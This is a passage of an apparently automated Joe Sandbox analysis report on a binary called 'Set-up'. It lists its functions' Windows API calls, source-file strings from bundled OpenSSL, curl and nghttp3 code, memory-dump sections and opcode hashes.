                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,009E2704,00000008), ref: 009E20C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcpystrlen$memcpymemset
                            • String ID: copy_integer$crypto/params.c$general_set_int
                            • API String ID: 2323844366-2562949257
                            • Opcode ID: 0b5de4c80d71f72fa37f60194a694dd917a58d0b8c8cb2f0082d06003fc5f4ad
                            • Instruction ID: ec97d7a9cc03311dd3a7443149259abafeddd3758c72727d7fd2c2dbe24ae2be
                            • Opcode Fuzzy Hash: 0b5de4c80d71f72fa37f60194a694dd917a58d0b8c8cb2f0082d06003fc5f4ad
                            • Instruction Fuzzy Hash: 4A213D70A0C3806BD2316B69AC82F77B79CDBC4715F184539F909862C3E6A6AC05C2A1
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,009E299E,00000008), ref: 009E21A8
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,009E299E,00000008), ref: 009E21FE
                              • Part of subcall function 009E40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E40C1
                              • Part of subcall function 009E40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E411E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: copy_integer$crypto/params.c$general_get_uint
                            • API String ID: 1297977491-1187682564
                            • Opcode ID: 505bf827b19fef9072689f70cf12430cbcd0f3941acd92c28e0cfce76dc367e2
                            • Instruction ID: 3945f2c8a2e8104eb97d18b92d90673b81a4541c9440630d3b525c30c17b90d7
                            • Opcode Fuzzy Hash: 505bf827b19fef9072689f70cf12430cbcd0f3941acd92c28e0cfce76dc367e2
                            • Instruction Fuzzy Hash: D9215776B4C3407BD13536A9BC03F6F674DCBC4B24F180835F7096A2C3EA92AD1542A0
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,009E2BF4,00000008), ref: 009E22C1
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,009E2BF4,00000008), ref: 009E2312
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: copy_integer$crypto/params.c$general_set_uint
                            • API String ID: 1297977491-3191580373
                            • Opcode ID: 64bd6284c88d39b7fe8af4ba09bea0aded4b374f1402db95aaae9614537eb27d
                            • Instruction ID: e6c7bdc5cc65b595b6726ecf73750fc64980c8c7876a23629be468aee035175c
                            • Opcode Fuzzy Hash: 64bd6284c88d39b7fe8af4ba09bea0aded4b374f1402db95aaae9614537eb27d
                            • Instruction Fuzzy Hash: 992149717083806BDB3A67A9AC42F3A778C9BD4B14F18192DF6569A383E595AC404271
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E40C1
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E411E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcpystrlen$memcpymemset
                            • String ID: copy_integer$crypto/params.c$unsigned_from_signed
                            • API String ID: 2323844366-3781254518
                            • Opcode ID: 06c6eb434827f37625f978e4483a87cbc62b0c63a2e567f4a3affec96df167bd
                            • Instruction ID: b4a3c73a032be52a6b84f96aca57f658d8d4457ee9ba6e2f9a5d44a99298e16a
                            • Opcode Fuzzy Hash: 06c6eb434827f37625f978e4483a87cbc62b0c63a2e567f4a3affec96df167bd
                            • Instruction Fuzzy Hash: EE01F961B4C3503BD63176A56C03F6B6A48CBE1B15F180974F644A61C3E6D66C5442B1
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00D0C27C,nghttp3_qpack.c,00000811,?,?), ref: 008AE866
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,008B077F,?,?,00000000,00000000), ref: 008AE87B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
                            • API String ID: 1222420520-1270044496
                            • Opcode ID: fa12d0202ccd2b2e18e69982f9e56b9227629858efbb12899ea651cb38b8f2a6
                            • Instruction ID: eaf7c53e320eee02c3f5ec1e5c7a83ad7ece114dd7b53bc4c2a0fe02b3a9c473
                            • Opcode Fuzzy Hash: fa12d0202ccd2b2e18e69982f9e56b9227629858efbb12899ea651cb38b8f2a6
                            • Instruction Fuzzy Hash: 7581A575A006019FE710DF28D842A26B7F1FF56318F184A2CE84AD7B52E735F865CB92
                            APIs
                            • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(008054E6), ref: 00808235
                            • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 008082D4
                            • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 008082E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strrchr$_stat64
                            • String ID: mime.c
                            • API String ID: 2771713950-3378952128
                            • Opcode ID: dbfbfd7c3540c52546329d27afc6f9e7deab7f77602c6e8de5200f802478b29b
                            • Instruction ID: af5acaf7426e1f0defb0f7b1202ca0d00f31d177fc826c08aa853e1a939ea916
                            • Opcode Fuzzy Hash: dbfbfd7c3540c52546329d27afc6f9e7deab7f77602c6e8de5200f802478b29b
                            • Instruction Fuzzy Hash: 0251D0B1A00300DBEB509E18CC8276A3A94FF80B14F050178FD48DF3C6EBB5D9449B92
                            APIs
                            • htons.WS2_32(?), ref: 008443D8
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00844409
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00844457
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: htonsmemcpystrlen
                            • String ID: curl_addrinfo.c
                            • API String ID: 2973076469-1838508774
                            • Opcode ID: e51e3ad7a6abe42051b861dab44609c04f6653912a43b009b5032ba53accce18
                            • Instruction ID: bd6e60f81ead183f3ef14e27109b588dad7396910e9eaccf578e8ff6795ee214
                            • Opcode Fuzzy Hash: e51e3ad7a6abe42051b861dab44609c04f6653912a43b009b5032ba53accce18
                            • Instruction Fuzzy Hash: 844173B5A04749AFD7009F59C880B6AB7E4FF88314F048969ED89CB361E331E994CB91
                            APIs
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0083665D
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0083670E
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0083671C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$_time64
                            • String ID: altsvc.c
                            • API String ID: 2413861649-3234676706
                            • Opcode ID: d891e5dbf6641bb7aa55ccb574f375189dfd8968a63699c0cd8083aa0a1a009b
                            • Instruction ID: 1c64d26505a54124fd9a8e3ce1ffc8a39b437769973f7fc59e10e4079f82f024
                            • Opcode Fuzzy Hash: d891e5dbf6641bb7aa55ccb574f375189dfd8968a63699c0cd8083aa0a1a009b
                            • Instruction Fuzzy Hash: CC3185B1E083007BD750AE68AC8292B77D4FB94754F448538F949D6292F671ED24C693
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 008A435F
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 008A43EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                            • API String ID: 1222420520-4133914617
                            • Opcode ID: 688a4c133045e413a588c51b31e504619a3a3fef63f6aa39ed4021a470c5bae0
                            • Instruction ID: 4d9d3d4d413f9f76031a891ad1804d815977d81fdbeda659394f81590c4929c9
                            • Opcode Fuzzy Hash: 688a4c133045e413a588c51b31e504619a3a3fef63f6aa39ed4021a470c5bae0
                            • Instruction Fuzzy Hash: 6F31B672504205AFEB119F58EC05F9A37A9FF86319F0904B4E814DB6A3E776D428C762
                            APIs
                            • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,008A70DF,00000001,?,?,?), ref: 008AA0E5
                              • Part of subcall function 008AA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 008AA29A
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,008A70DF,00000001,?,?,?), ref: 008AA135
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assertmemcpymemmove
                            • String ID: ksl->head$nghttp3_ksl.c
                            • API String ID: 374949274-2784241221
                            • Opcode ID: cba67fc0028e9b85f5ec22e5afa0334937e028faf317be7053939c8e25f15bde
                            • Instruction ID: 38f8a4abc6681bb4cfb70f7039917e3fc98ada3af6c1356bfcfa44cef694aa55
                            • Opcode Fuzzy Hash: cba67fc0028e9b85f5ec22e5afa0334937e028faf317be7053939c8e25f15bde
                            • Instruction Fuzzy Hash: 5711B970204204EFDB189F04D88195AF7A6FF86314F58C55EE90A8BE41D330DC44CBA1
                            APIs
                            • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0083893B
                            • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00838960
                              • Part of subcall function 00827620: GetModuleHandleA.KERNEL32(ntdll), ref: 0082763F
                              • Part of subcall function 00827620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 0082764B
                              • Part of subcall function 00827620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00827695
                              • Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 008276D3
                              • Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 008276DA
                              • Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 008276E4
                              • Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 008276EB
                              • Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 008276FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
                            • String ID: @$ @
                            • API String ID: 2103437208-1089145642
                            • Opcode ID: 9f9e8be776bdb5dde0119da2e1f6d1b14926adba6ba5a0dd73416e9d38016584
                            • Instruction ID: 0aa4a7a93a62aba68f4ee24961a6879576ae645b28f04c966544eaee7c933875
                            • Opcode Fuzzy Hash: 9f9e8be776bdb5dde0119da2e1f6d1b14926adba6ba5a0dd73416e9d38016584
                            • Instruction Fuzzy Hash: 010180B05083469BEB109F14FD4A7BA7BE5FF81305F014428FA84A6291E7B58AC9C683
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00928A9A
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00928AEA
